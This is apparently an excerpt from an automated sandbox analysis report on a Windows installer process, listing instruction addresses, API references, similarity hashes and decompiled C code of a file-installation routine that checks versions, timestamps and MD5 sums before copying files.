0x00403e83
0x00403e89
0x00403dc3
0x00403dc3
0x00000000
0x00403dc5
0x00403dc5
0x00403dc5
0x00403dc7
0x00403dcd
0x00403dcd
0x00403dcd
0x00403dd2
0x00403dd2
0x00403dd4
0x00000000
0x00000000
0x00403dd6
0x00403dd8
0x00403dde
0x00403dde
0x00403de2
0x00403de9
0x00403deb
0x00403df0
0x00403df5
0x00403dfa
0x00403dfa
0x00403dfc
0x00403dfc
0x00403dfc
0x00403dfe
0x00403e01
0x00403e03
0x00403e04
0x00403e04
0x00403e08
0x00403e0d
0x00403e12
0x00403e12
0x00403e17
0x00403e17
0x00403e19
0x00403e1c
0x00403e22
0x00403e24
0x00403e25
0x00403e25
0x00403e25
0x00403e2a
0x00403e31
0x00403e48
0x00403e4d
0x00403e57
0x00403e33
0x00403e41
0x00403e41
0x00403e31
0x00403e61
0x00403e6b
0x00403e70
0x00403e75
0x00403e7c
0x00403e7e
0x00000000
0x00403e7e
0x00403e7c
0x00403dc7
0x00403dc3
0x00403dbd
0x00403e8e
0x00403e93
0x00403e9a
0x00403e9f
0x00403ea1
0x00403ea3
0x00403ea3
0x00403eaa
0x00403eb0
0x00403eb6
0x00403ebc
0x00403ebc
0x00403ebd
0x0040304e
0x0040304e
0x00403054
0x00403056
0x00402f78
0x00402f7b
0x00402f7e
0x00402f80
0x00402f85
0x00402fb3
0x00402fb8
0x00402fcb
0x00402fcb
0x00402fd0
0x00403001
0x00402fd2
0x00402fd2
0x00402fd5
0x00402ffd
0x00402fd7
0x00000000
0x00402fd7
0x00402fd5
0x00402fba
0x00402fba
0x00402ff9
0x00402fbc
0x00402fbc
0x00402fbc
0x00402fc1
0x00000000
0x00402fc3
0x00402fc3
0x00402fc3
0x00402fc4
0x00402fd9
0x00402fc6
0x00402fc6
0x00402fc7
0x00402fed
0x00402fc9
0x00000000
0x00402fc9
0x00402fc7
0x00402fc4
0x00402fc1
0x00402fba
0x00402f87
0x00402f87
0x00402fe5
0x00402fe5
0x00402f89
0x00402f89
0x00402f8e
0x00402faa
0x00402fad
0x00000000
0x00402faf
0x00402faf
0x00402fe1
0x00402fb1
0x00000000
0x00402fb1
0x00402faf
0x00402f90
0x00402f90
0x00402fe9
0x00402f92
0x00402f92
0x00402f97
0x00402ff5
0x00402f99
0x00402f99
0x00402f9e
0x00402fdd
0x00402fa0
0x00402fa1
0x00402ff1
0x00402ff1
0x00402fa3
0x00403005
0x00403005
0x00403005
0x00402fa1
0x00402f9e
0x00402f97
0x00402f90
0x00402f8e
0x00402f87
0x00403015
0x0040305c
0x0040305c
0x0040305e
0x00403060
0x00403062
0x00000000
0x00403068
0x00403068
0x00000000
0x00403068
0x00403062
0x00403056
0x0040304c

APIs

RtlUnwind.KERNEL32(?,0040303C,00000000,00000000), ref: 00403037

Strings

T\@, xrefs: 00403070
`[@, xrefs: 0040304E

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Unwind
String ID: T\@$`[@
API String ID: 3419175465-559789145
Opcode ID: cf052ca5a1dfdc8996027feea02f07a474dc396ed8bdb9d7668b73762b1fe144
Instruction ID: cb865691cce5fd3c7a7f640cb22bbe848836da1b56ac3702cd8c9ca671f9cc7d
Opcode Fuzzy Hash: cf052ca5a1dfdc8996027feea02f07a474dc396ed8bdb9d7668b73762b1fe144
Instruction Fuzzy Hash: C31182352046029BD724DE18CA89B2777B5AB44744F24C13AA404AB3DAC77CDC41A7A9

Uniqueness

Uniqueness Score: -1.00%

Function 004030DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004030DC() {

				E00403094();
				 *0x40b014 = GetModuleHandleA(0);
				 *0x40b01c = GetCommandLineA();
				 *0x40b018 = 0xa;
				return 0x402e34;
			}

0x004030dc
0x004030e8
0x004030f3
0x004030f9
0x00403108

APIs

GetModuleHandleA.KERNEL32(00000000,004096A2), ref: 004030E3
GetCommandLineA.KERNEL32(00000000,004096A2), ref: 004030EE

Strings

U1hd.@, xrefs: 00403103

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CommandHandleLineModule
String ID: U1hd.@
API String ID: 2123368496-2904493091
Opcode ID: dc37779357fa3c8f6d3c103c1a1d04ce0330030a2a249e6f734b52dac6989e3b
Instruction ID: fc6106ec3918557feb9e8595d18864a5322139aa66bf0d8c86619f258e517ec6
Opcode Fuzzy Hash: dc37779357fa3c8f6d3c103c1a1d04ce0330030a2a249e6f734b52dac6989e3b
Instruction Fuzzy Hash: 04C002745413408AD76CAFB69E4A70A3994E785309F40883FA218BE3F1DB7C4605ABDD

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: is-QPTG8.tmpPID: 6080, Parent PID: 6084COMMON

Execution Graph

Execution Coverage:	12.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	90

Executed Functions

Function 00468940 Relevance: 70.8, APIs: 4, Strings: 36, Instructions: 846
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00468940(signed int __eax, void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int* _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v9;
				intOrPtr _v16;
				char _v17;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v64;
				char _v65;
				signed short _v70;
				signed int _v72;
				signed short _v74;
				signed int _v76;
				signed short _v78;
				signed int _v80;
				signed short _v82;
				signed int _v84;
				char _v85;
				signed int _v86;
				char _v87;
				signed int _v92;
				struct _FILETIME _v100;
				struct _FILETIME _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void _v132;
				char _v148;
				signed int _v152;
				char _v156;
				char _v160;
				char _v164;
				signed int _v168;
				char _v172;
				signed int _v176;
				char _v180;
				signed int _v184;
				char _v188;
				signed int _v192;
				char _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				char _v212;
				char _v216;
				signed int _t490;
				char _t505;
				signed int _t510;
				intOrPtr _t529;
				intOrPtr _t535;
				signed int _t561;
				signed int _t576;
				signed int _t629;
				signed int _t646;
				signed int _t656;
				signed int _t666;
				signed int _t673;
				signed int _t688;
				signed int _t693;
				signed int _t696;
				signed int _t697;
				void* _t710;
				signed int _t722;
				signed int _t731;
				void* _t744;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t755;
				signed int _t765;
				signed int _t779;
				FILETIME* _t800;
				signed int _t802;
				void* _t805;
				intOrPtr _t814;
				intOrPtr _t823;
				void* _t834;
				intOrPtr _t863;
				intOrPtr _t869;
				intOrPtr _t871;
				intOrPtr _t873;
				intOrPtr _t876;
				intOrPtr _t878;
				intOrPtr _t879;
				intOrPtr _t887;
				intOrPtr _t888;
				intOrPtr _t899;
				intOrPtr _t902;
				intOrPtr _t904;
				intOrPtr _t907;
				intOrPtr _t911;
				intOrPtr _t920;
				intOrPtr _t923;
				intOrPtr _t925;
				intOrPtr _t936;
				void* _t943;
				void* _t944;
				intOrPtr _t945;
				char _t963;

				_t941 = __esi;
				_t938 = __edi;
				_t820 = __ecx;
				_t943 = _t944;
				_t945 = _t944 + 0xffffff2c;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v152 = 0;
				_v196 = 0;
				_v32 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v52 = 0;
				_v64 = 0;
				_v16 = __ecx;
				_v9 = __edx;
				_v8 = __eax;
				E00403870(_v16);
				E00403870(_a12);
				_push(_t943);
				_push(0x4699d0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t945;
				E00455814("-- File entry --", 0, __edi, __esi);
				_v55 = 0;
				_v54 = 0;
				_t818 =  *((intOrPtr*)(_v8 + 0x38));
				if( *((intOrPtr*)(_v8 + 0x38)) == 0xffffffff) {
					__eflags = 0;
					_v36 = 0;
				} else {
					_t814 =  *0x4ae1e4; // 0x21d2aec
					_v36 = E0040B654(_t814, _t818);
				}
				E00403548( &_v48);
				_v56 = 0;
				_v17 = 0;
				_v28 =  *0x4adf7c;
				_v24 =  *0x4adf80;
				E00403548( &_v32);
				E00403548( &_v64);
				_push(_t943);
				_push(0x469897);
				_push( *[fs:edx]);
				 *[fs:edx] = _t945;
				_push(_t943);
				_push(0x46984e);
				_push( *[fs:edx]);
				 *[fs:edx] = _t945;
				_v58 = 0;
				_v92 = 0;
				if(_v9 != 0) {
					_v92 = _v92 | 0x00000800;
				}
				if(( *(_v8 + 0x4a) & 0x00000010) != 0) {
					_v92 = _v92 | 0x00000010;
				}
				if(( *(_v8 + 0x4a) & 0x00000020) != 0) {
					_v92 = _v92 | 0x00000040;
				}
				if(( *(_v8 + 0x4b) & 0x00000080) != 0) {
					_v92 = _v92 | 0x00000080;
				}
				if(( *(_v8 + 0x4c) & 0x00000010) != 0) {
					_v92 = _v92 | 0x00000100;
				}
				E00403548( &_v52);
				_t490 = _v8;
				_t958 =  *((intOrPtr*)(_t490 + 0x4e)) != 1;
				if( *((intOrPtr*)(_t490 + 0x4e)) != 1) {
					__eflags = _a12;
					if(_a12 != 0) {
						E004035DC( &_v44, _a12);
					} else {
						E004717F8( *((intOrPtr*)(_v8 + 4)), _t820,  &_v44);
					}
				} else {
					_t936 =  *0x4ae048; // 0x22307f0
					E004035DC( &_v44, _t936);
				}
				E0042C8F0(_v44,  &_v152);
				E004035DC( &_v44, _v152);
				E00466AE0(_v44, _t818, 1, _t938, _t941, _t958);
				_v160 = _v44;
				_v156 = 0xb;
				_t821 = 0;
				E00455A04("Dest filename: %s", _t818, 0,  &_v160, _t938, _t941);
				_v86 = 0;
				if( *0x4ae24f != 0 &&  *0x4ae260 >= 0x5000000) {
					_t805 = E004532AC(_v9, _t818, _v44, _t938, _t941); // executed
					if(_t805 != 0) {
						E00455814("Dest file is protected by Windows File Protection.", _t818, _t938, _t941);
						_t80 =  &_v86;
						 *_t80 =  *((char*)(_v8 + 0x4e)) == 0;
						_t963 =  *_t80;
					}
				}
				_t505 = E00451830(_v9, _v44, _t963); // executed
				_v53 = _t505;
				if(_v55 == 0) {
					_v54 = _v53;
					_v55 = 1;
				}
				if(_v54 != 0) {
					_v92 = _v92 | 0x00000001;
				}
				if(_v36 == 0) {
					_t821 =  &_v100;
					_t819 = E004531A8( &_v100, _v16, __eflags);
				} else {
					if(( *(_v36 + 0x44) & 0x00000004) == 0) {
						_t800 = _v36 + 0x34;
						__eflags = _t800;
						LocalFileTimeToFileTime(_t800,  &_v100);
					} else {
						_t802 = _v36;
						_v100.dwLowDateTime =  *(_t802 + 0x34);
						_v100.dwHighDateTime =  *((intOrPtr*)(_t802 + 0x38));
					}
					_t819 = 1;
				}
				if(_t819 == 0) {
					E00455814("Time stamp of our file: (failed to read)", _t819, _t938, _t941);
				} else {
					E00466E18( &_v100,  &_v152);
					_v160 = _v152;
					_v156 = 0xb;
					_t821 = 0;
					E00455A04("Time stamp of our file: %s", _t819, 0,  &_v160, _t938, _t941);
				}
				if(_v53 == 0) {
					_t510 = _v8;
					__eflags =  *(_t510 + 0x4b) & 0x00000020;
					if(( *(_t510 + 0x4b) & 0x00000020) == 0) {
						goto L103;
					} else {
						__eflags = _v54;
						if(_v54 != 0) {
							goto L103;
						} else {
							E00455814("Skipping due to \"onlyifdestfileexists\" flag.", _t819, _t938, _t941);
							goto L121;
						}
					}
				} else {
					E00455814("Dest file exists.", _t819, _t938, _t941);
					if(( *(_v8 + 0x4c) & 0x00000001) == 0) {
						_t899 =  *0x48dc50; // 0x21e99e0
						E004035DC( &_v32, _t899);
						_t821 =  &_v108;
						_v85 = E004531A8( &_v108, _v44, __eflags);
						__eflags = _v85;
						if(_v85 == 0) {
							E00455814("Time stamp of existing file: (failed to read)", _t819, _t938, _t941);
						} else {
							E00466E18( &_v108,  &_v152);
							_v160 = _v152;
							_v156 = 0xb;
							_t821 = 0;
							E00455A04("Time stamp of existing file: %s", _t819, 0,  &_v160, _t938, _t941);
						}
						_t656 = _v8;
						__eflags =  *(_t656 + 0x4c) & 0x00000002;
						if(( *(_t656 + 0x4c) & 0x00000002) != 0) {
							_v87 = 1;
							goto L74;
						} else {
							_v87 = 0;
							__eflags = _v36;
							if(_v36 == 0) {
								E0042C8F0(_v16,  &_v152);
								_v65 = E0045164C(_v9,  &_v76, _v152, __eflags);
							} else {
								_t779 = _v36;
								__eflags =  *(_t779 + 0x44) & 0x00000001;
								_v65 = _t779 & 0xffffff00 | ( *(_t779 + 0x44) & 0x00000001) != 0x00000000;
								_v76 =  *(_v36 + 0x3c);
								_v72 =  *(_v36 + 0x40);
							}
							__eflags = _v65;
							if(_v65 == 0) {
								E00455814("Version of our file: (none)", _t819, _t938, _t941);
							} else {
								_v192 = _v74 & 0x0000ffff;
								_v188 = 0;
								_v184 = _v76 & 0x0000ffff;
								_v180 = 0;
								_v176 = _v70 & 0x0000ffff;
								_v172 = 0;
								_v168 = _v72 & 0x0000ffff;
								_v164 = 0;
								E00455A04("Version of our file: %u.%u.%u.%u", _t819, 3,  &_v192, _t938, _t941);
							}
							E0042C8F0(_v44,  &_v152);
							_t821 =  &_v84;
							_t722 = E0045164C(_v9,  &_v84, _v152, __eflags);
							__eflags = _t722;
							if(_t722 == 0) {
								E00455814("Version of existing file: (none)", _t819, _t938, _t941);
								__eflags = _v65;
								if(_v65 == 0) {
									_v87 = 1;
								}
								goto L74;
							} else {
								_v192 = _v82 & 0x0000ffff;
								_v188 = 0;
								_v184 = _v84 & 0x0000ffff;
								_v180 = 0;
								_v176 = _v78 & 0x0000ffff;
								_v172 = 0;
								_v168 = _v80 & 0x0000ffff;
								_v164 = 0;
								_t821 = 3;
								E00455A04("Version of existing file: %u.%u.%u.%u", _t819, 3,  &_v192, _t938, _t941);
								__eflags = _v65;
								if(_v65 == 0) {
									L53:
									_t731 = _v8;
									 *(_t731 + 0x4c) & 0x00000004 = (_t731 & 0xffffff00 | ( *(_t731 + 0x4c) & 0x00000004) != 0x00000000) ^ 0x00000001 | _v86;
									if(((_t731 & 0xffffff00 | ( *(_t731 + 0x4c) & 0x00000004) != 0x00000000) ^ 0x00000001 | _v86) != 0) {
										L55:
										E00455814("Existing file is a newer version. Skipping.", _t819, _t938, _t941);
										goto L121;
									} else {
										E004035DC( &_v152, _v44);
										E004036C4( &_v152, 0x469be4);
										_t920 =  *0x48dc88; // 0x21e9d24
										E004036C4( &_v152, _t920);
										_t821 = 2;
										_t744 = E00473BCC(_v152, _t819, 2, 0, _t938, _t941, 6, 1, 4);
										__eflags = _t744 - 7;
										if(_t744 == 7) {
											goto L74;
										} else {
											goto L55;
										}
									}
								} else {
									__eflags = _v84 - _v76;
									if(_v84 > _v76) {
										goto L53;
									} else {
										__eflags = _v84 - _v76;
										if(_v84 != _v76) {
											L56:
											__eflags = _v84 - _v76;
											if(_v84 != _v76) {
												L74:
												__eflags = _v87;
												if(_v87 == 0) {
													L85:
													E00403548( &_v32);
													__eflags = _v86;
													if(_v86 == 0) {
														__eflags =  *(_v8 + 0x4a) & 0x00000001;
														if(__eflags == 0) {
															goto L90;
														} else {
															E004035DC( &_v152, _v44);
															E004036C4( &_v152, 0x469be4);
															_t907 =  *0x48dca0; // 0x21ea038
															E004036C4( &_v152, _t907);
															_t821 = 1;
															__eflags = E00473BCC(_v152, _t819, 1, 0, _t938, _t941, 7, 1, 4) - 6;
															if(__eflags == 0) {
																while(1) {
																	L90:
																	_t819 = E004515D4(_v9, _v44, __eflags);
																	__eflags = _t819 - 0xffffffff;
																	if(_t819 == 0xffffffff) {
																		break;
																	}
																	__eflags = _t819 & 0x00000001;
																	if((_t819 & 0x00000001) == 0) {
																		break;
																	} else {
																		__eflags =  *(_v8 + 0x4b) & 0x00000004;
																		if(__eflags != 0) {
																			L95:
																			_t902 =  *0x48dc24; // 0x21e9794
																			E004035DC( &_v32, _t902);
																			_t821 = _t819 & 0xfffffffe;
																			_t666 = E00451918(_v9, _t819 & 0xfffffffe, _v44, __eflags);
																			__eflags = _t666;
																			if(_t666 == 0) {
																				E00455814("Failed to strip read-only attribute.", _t819, _t938, _t941);
																			} else {
																				E00455814("Stripped read-only attribute.", _t819, _t938, _t941);
																			}
																			__eflags =  *(_v8 + 0x4b) & 0x00000004;
																			if(__eflags != 0) {
																				break;
																			} else {
																				continue;
																			}
																		} else {
																			_t904 =  *0x48dc8c; // 0x21e9dd4
																			_t673 = E00466D28(_v44, _t819, _t821, _t904, _t938, _t941, __eflags);
																			__eflags = _t673;
																			if(_t673 == 0) {
																				goto L95;
																			} else {
																				E00455814("User opted not to strip the existing file\'s read-only attribute. Skipping.", _t819, _t938, _t941);
																				goto L121;
																			}
																		}
																	}
																	goto L148;
																}
																L103:
																E00455814("Installing the file.", _t819, _t938, _t941);
																E004035DC( &_v40, _v16);
																__eflags = _v9 -  *0x4ae259; // 0x0
																if(__eflags != 0) {
																	_v57 = 0;
																} else {
																	__eflags = _v40;
																	if(_v40 == 0) {
																		_t821 =  &_v152;
																		_t819 =  *_a8;
																		 *((intOrPtr*)( *_a8 + 0xc))();
																		__eflags = _v152;
																		if(__eflags != 0) {
																			_t821 =  &_v196;
																			_t819 =  *_a8;
																			 *((intOrPtr*)( *_a8 + 0xc))();
																			_t576 = E00451830(_v9, _v196, __eflags);
																			__eflags = _t576;
																			if(_t576 != 0) {
																				_t821 =  &_v40;
																				_t819 =  *_a8;
																				 *((intOrPtr*)( *_a8 + 0xc))();
																			}
																		}
																	}
																	__eflags = _v40;
																	_v57 = _v40 == 0;
																}
																_t863 =  *0x48dc30; // 0x21e9868
																E004035DC( &_v32, _t863);
																E0042CA40(_v44, _t821,  &_v152);
																E00451EA4(_v9, _t819, 0x469f50, _v152, _t938, _t941,  &_v48); // executed
																E0042C990(_v48, 0x469f50,  &_v152);
																_t823 =  *0x469f58; // 0x0
																E00467F84(_v9, _t819, _t823, _v152, _t938, _t941, __eflags, _a16); // executed
																_t529 = E00451994(_v9, _t819, 0, _v48, _t941, __eflags, 0, 1); // executed
																_v112 = _t529;
																_push(_t943);
																_push(0x46938a);
																_push( *[fs:eax]);
																 *[fs:eax] = _t945;
																_v56 = 1;
																_push(_t943);
																_push(0x46931a);
																_push( *[fs:eax]);
																 *[fs:eax] = _t945;
																_v17 = 1;
																_t869 =  *0x48dc54; // 0x21e9a28
																E004035DC( &_v32, _t869);
																__eflags = _v40;
																if(__eflags != 0) {
																	_t535 = E00451994(_v9, _t819, 2, _v40, _t941, __eflags, 1, 0); // executed
																	_v116 = _t535;
																	_push(_t943);
																	_push(0x469309);
																	_push( *[fs:eax]);
																	 *[fs:eax] = _t945;
																	_t871 =  *0x48dc28; // 0x21e97f0
																	E004035DC( &_v32, _t871);
																	__eflags = _v36;
																	if(_v36 == 0) {
																		E00466F5C(_v116, _a4, _v112);
																	} else {
																		_t353 = _v36 + 0x14; // 0x14
																		E00466F5C(_v116, _t353, _v112);
																	}
																	__eflags = 0;
																	_pop(_t873);
																	 *[fs:eax] = _t873;
																	_push(0x469310);
																	return E00402CA0(_v116);
																} else {
																	E004666D8(E0046608C(), 0x466d1c, _v36, _t938); // executed
																	_t876 =  *0x48dc28; // 0x21e97f0
																	E004035DC( &_v32, _t876);
																	__eflags =  *(_v8 + 0x4c) & 0x00000080;
																	E004668FC(E0046608C(), _t819, _v112, _v36, _t938, _t941, (_v8 & 0xffffff00 | __eflags != 0x00000000) ^ 0x00000001, 0x466d1c); // executed
																	_pop(_t878);
																	_pop(_t834);
																	 *[fs:eax] = _t878;
																	SetFileTime( *(_v112 + 4), 0, 0,  &_v100); // executed
																	_t561 = _v8;
																	__eflags =  *((char*)(_t561 + 0x4e)) - 1;
																	if( *((char*)(_t561 + 0x4e)) == 1) {
																		_v57 = 0;
																		E0046846C(_v112, 0x6e556e49); // executed
																		__eflags =  *0x4adfd1;
																		if( *0x4adfd1 == 0) {
																			E00468498(_v112, _t834); // executed
																		}
																	}
																	__eflags = 0;
																	_pop(_t879);
																	 *[fs:eax] = _t879;
																	_push(0x469391);
																	return E00402CA0(_v112);
																}
															} else {
																E00455814("User opted not to overwrite the existing file. Skipping.", _t819, _t938, _t941);
																goto L121;
															}
														}
													} else {
														E00455814("Existing file is protected by Windows File Protection. Skipping.", _t819, _t938, _t941);
														goto L121;
													}
												} else {
													_t688 = _v8;
													__eflags =  *(_t688 + 0x4a) & 0x00000080;
													if(( *(_t688 + 0x4a) & 0x00000080) == 0) {
														goto L85;
													} else {
														__eflags = _t819;
														if(_t819 == 0) {
															L78:
															E00455814("Couldn\'t read time stamp. Skipping.", _t819, _t938, _t941);
															goto L121;
														} else {
															__eflags = _v85;
															if(_v85 != 0) {
																_t693 = CompareFileTime( &_v108,  &_v100);
																__eflags = _t693;
																if(_t693 != 0) {
																	_t696 = CompareFileTime( &_v108,  &_v100);
																	__eflags = _t696;
																	if(_t696 <= 0) {
																		goto L85;
																	} else {
																		_t697 = _v8;
																		 *(_t697 + 0x4c) & 0x00000004 = (_t697 & 0xffffff00 | ( *(_t697 + 0x4c) & 0x00000004) != 0x00000000) ^ 0x00000001 | _v86;
																		if(((_t697 & 0xffffff00 | ( *(_t697 + 0x4c) & 0x00000004) != 0x00000000) ^ 0x00000001 | _v86) != 0) {
																			L84:
																			E00455814("Existing file has a later time stamp. Skipping.", _t819, _t938, _t941);
																			goto L121;
																		} else {
																			E004035DC( &_v152, _v44);
																			E004036C4( &_v152, 0x469be4);
																			_t911 =  *0x48dc88; // 0x21e9d24
																			E004036C4( &_v152, _t911);
																			_t821 = 2;
																			_t710 = E00473BCC(_v152, _t819, 2, 0, _t938, _t941, 6, 1, 4);
																			__eflags = _t710 - 7;
																			if(_t710 == 7) {
																				goto L85;
																			} else {
																				goto L84;
																			}
																		}
																	}
																} else {
																	E00455814("Same time stamp. Skipping.", _t819, _t938, _t941);
																	goto L121;
																}
															} else {
																goto L78;
															}
														}
													}
												}
											} else {
												__eflags = _v80 - _v72;
												if(_v80 != _v72) {
													goto L74;
												} else {
													_t749 = _v8;
													__eflags =  *(_t749 + 0x4b) & 0x00000008;
													if(( *(_t749 + 0x4b) & 0x00000008) != 0) {
														goto L74;
													} else {
														_t750 = _v8;
														__eflags =  *(_t750 + 0x4c) & 0x00000040;
														if(( *(_t750 + 0x4c) & 0x00000040) == 0) {
															_t751 = _v8;
															__eflags =  *(_t751 + 0x4a) & 0x00000080;
															if(( *(_t751 + 0x4a) & 0x00000080) != 0) {
																_v87 = 1;
																goto L74;
															} else {
																E00455814("Same version. Skipping.", _t819, _t938, _t941);
																goto L121;
															}
														} else {
															_t821 =  &_v148;
															_t755 = E00466F04(_v9,  &_v148, _v44);
															__eflags = _t755;
															if(_t755 == 0) {
																E00455814("Failed to read existing file\'s MD5 sum. Proceeding.", _t819, _t938, _t941);
																goto L74;
															} else {
																__eflags = _v36;
																if(_v36 == 0) {
																	_t923 =  *0x48dc54; // 0x21e9a28
																	E004035DC( &_v32, _t923);
																	_t821 =  &_v132;
																	E004531F0(_v9, _t819,  &_v132, _v16, _t941);
																	_t925 =  *0x48dc50; // 0x21e99e0
																	E004035DC( &_v32, _t925);
																} else {
																	_t222 = _v36 + 0x24; // 0x24
																	_t941 = _t222;
																	memcpy( &_v132, _t941, 4 << 2);
																	_t945 = _t945 + 0xc;
																	_t938 = _t941 + 8;
																	_t821 = 0;
																}
																_t765 = E00430CAC( &_v148,  &_v132);
																__eflags = _t765;
																if(_t765 == 0) {
																	E00455814("Existing file\'s MD5 sum is different from our file. Proceeding.", _t819, _t938, _t941);
																	goto L74;
																} else {
																	E00455814("Existing file\'s MD5 sum matches our file. Skipping.", _t819, _t938, _t941);
																	goto L121;
																}
															}
														}
													}
												}
											}
										} else {
											__eflags = _v80 - _v72;
											if(_v80 <= _v72) {
												goto L56;
											} else {
												goto L53;
											}
										}
									}
								}
							}
						}
					} else {
						E00455814("Skipping due to \"onlyifdoesntexist\" flag.", _t819, _t938, _t941);
						L121:
						if(( *(_v8 + 0x4a) & 0x00000010) != 0) {
							L123:
							if(E00451830(_v9, _v44, _t973) != 0) {
								E00403548( &_v32);
								_t629 = _v8;
								_t975 =  *(_t629 + 0x4a) & 0x00000020;
								if(( *(_t629 + 0x4a) & 0x00000020) == 0) {
									E00455814("Will register the file (a DLL/OCX) later.", _t819, _t938, _t941);
								} else {
									E00455814("Will register the file (a type library) later.", _t819, _t938, _t941);
								}
								_t819 = E00403CC8(_t975);
								E00403598(_t819, _t819, _v44, _t938, _t941);
								 *((char*)(_t819 + 4)) = _v9;
								 *((char*)(_t819 + 5)) = _v8 & 0xffffff00 | ( *(_v8 + 0x4a) & 0x00000020) != 0x00000000;
								 *((char*)(_t819 + 6)) = _v8 & 0xffffff00 | ( *(_v8 + 0x4b) & 0x00000040) != 0x00000000;
								E0040B5B8( *((intOrPtr*)(_a16 - 0x10)), _t819);
							}
						} else {
							_t646 = _v8;
							_t973 =  *(_t646 + 0x4a) & 0x00000020;
							if(( *(_t646 + 0x4a) & 0x00000020) != 0) {
								goto L123;
							}
						}
						if(( *(_v8 + 0x4a) & 0x00000040) != 0) {
							E00403548( &_v32);
							_t980 = _v9;
							if(_v9 == 0) {
								E00455814("Incrementing shared file count (32-bit).", _t819, _t938, _t941);
								E00452AD8(_t819, _v54, _v44, _t938, _t941, __eflags);
							} else {
								E00455814("Incrementing shared file count (64-bit).", _t819, _t938, _t941);
								E00452AD8(_t819, _v54, _v44, _t938, _t941, _t980);
							}
							if(( *(_v8 + 0x4a) & 0x00000002) != 0) {
								__eflags = _v9;
								if(_v9 == 0) {
									_v216 = _v44;
									E00456F28( *((intOrPtr*)(_a16 - 4)), _t819,  &_v216, 0x8a, _t938, _t941, 0, 0);
								} else {
									_v216 = _v44;
									E00456F28( *((intOrPtr*)(_a16 - 4)), _t819,  &_v216, 0x8a, _t938, _t941, 1, 0);
								}
							} else {
								_v92 = _v92 | 0x00000008;
								if(_v9 != 0) {
									_v92 = _v92 | 0x00000400;
								}
								if(( *(_v8 + 0x4d) & 0x00000001) != 0) {
									_v92 = _v92 | 0x00000200;
								}
								_v212 = _v44;
								_v208 = _v48;
								_v204 =  *((intOrPtr*)(_v8 + 8));
								_v200 = _v52;
								E00456F28( *((intOrPtr*)(_a16 - 4)), _t819,  &_v212, 0x82, _t938, _t941, _v92, 3);
							}
						}
						E00403548( &_v32);
						if(_v48 == 0) {
							E0046886C(_v9,  *((short*)(_v8 + 0x48)), _v44, _t938);
						} else {
							E0046886C(_v9,  *((short*)(_v8 + 0x48)), _v48, _t938);
						}
						_pop(_t887);
						 *[fs:eax] = _t887;
						_pop(_t888);
						 *[fs:eax] = _t888;
						_push(0x46989e);
						_t987 = _v56;
						if(_v56 != 0) {
							return E004513FC(_v9, _v48, _t987);
						}
						return 0;
					}
				}
				L148:
			}

0x00468940
0x00468940
0x00468940
0x00468941
0x00468943
0x00468949
0x0046894a
0x0046894b
0x0046894e
0x00468954
0x0046895a
0x0046895d
0x00468960
0x00468963
0x00468966
0x00468969
0x0046896c
0x0046896f
0x00468972
0x00468978
0x00468980
0x00468987
0x00468988
0x0046898d
0x00468990
0x00468998
0x0046899d
0x004689a1
0x004689a8
0x004689ae
0x004689c1
0x004689c3
0x004689b0
0x004689b2
0x004689bc
0x004689bc
0x004689c9
0x004689ce
0x004689d2
0x004689dc
0x004689e5
0x004689eb
0x004689f3
0x004689fa
0x004689fb
0x00468a00
0x00468a03
0x00468a08
0x00468a09
0x00468a0e
0x00468a11
0x00468a14
0x00468a1a
0x00468a21
0x00468a23
0x00468a23
0x00468a31
0x00468a33
0x00468a33
0x00468a3e
0x00468a40
0x00468a40
0x00468a4b
0x00468a4d
0x00468a4d
0x00468a5b
0x00468a5d
0x00468a5d
0x00468a67
0x00468a6c
0x00468a72
0x00468a74
0x00468a86
0x00468a8a
0x00468aa2
0x00468a8c
0x00468a95
0x00468a95
0x00468a76
0x00468a79
0x00468a7f
0x00468a7f
0x00468ab0
0x00468abe
0x00468ac8
0x00468ad0
0x00468ad6
0x00468ae3
0x00468aea
0x00468aef
0x00468afa
0x00468b0e
0x00468b15
0x00468b1c
0x00468b28
0x00468b28
0x00468b28
0x00468b28
0x00468b15
0x00468b32
0x00468b37
0x00468b3e
0x00468b43
0x00468b46
0x00468b46
0x00468b4e
0x00468b50
0x00468b50
0x00468b58
0x00468b88
0x00468b96
0x00468b5a
0x00468b61
0x00468b7b
0x00468b7b
0x00468b7f
0x00468b63
0x00468b63
0x00468b69
0x00468b6f
0x00468b6f
0x00468b84
0x00468b84
0x00468b9a
0x00468bd6
0x00468b9c
0x00468ba5
0x00468bb0
